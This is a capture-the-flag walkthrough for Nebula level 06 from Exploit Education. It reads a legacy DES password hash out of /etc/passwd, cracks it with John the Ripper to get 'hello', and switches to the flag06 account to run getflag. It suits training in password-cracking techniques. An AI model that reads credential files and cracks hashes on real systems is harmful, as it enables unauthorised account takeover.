Exploit-Education Nebula Level 06
Exploit Education Level 6
Challenge
The flag06
account credentials came from a legacy unix system.
To do this level, log in as the level06
account with the password level06
. Files for this level can be found in /home/flag06
.
Vulnerability
It is mentioned that the user account was created using a legacy unix system.
In older systems the account passwords used to be saved in the /etc/passwd
file and was encrypted using a
weak algorithm (DES Algorithm)
Lets look at the passwd file
level06@nebula:/etc$ cat passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
And we can see the username and an encrypted password. Lets copy it into a file named p.john
and try cracking it
using John the Ripper
C:> .\john.exe 'p.john'
Warning: detected hash type "descrypt", but the string is also recognized as "descrypt-opencl"
Use the "--format=descrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 256/256 AVX2])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 642 candidates buffered for the current salt, minimum 1024 needed for performance.
Proceeding with wordlist:/run/password.lst, rules:Wordlist
hello (flag06) //Password and Username
1g 0:00:00:00 DONE 2/3 (2019-08-07 09:17) 4.166g/s 73616p/s 73616c/s 73616C/s 123456..betabeta
Use the "--show" option to display all of the cracked passwords reliably
Session completed
And it was cracked quickly since it was using a weak algorithm and a even more weaker password
Lets login using these credentials
level06@nebula:/etc$ su - flag06
Password:
flag06@nebula:~$ getflag
You have successfully executed getflag on a target account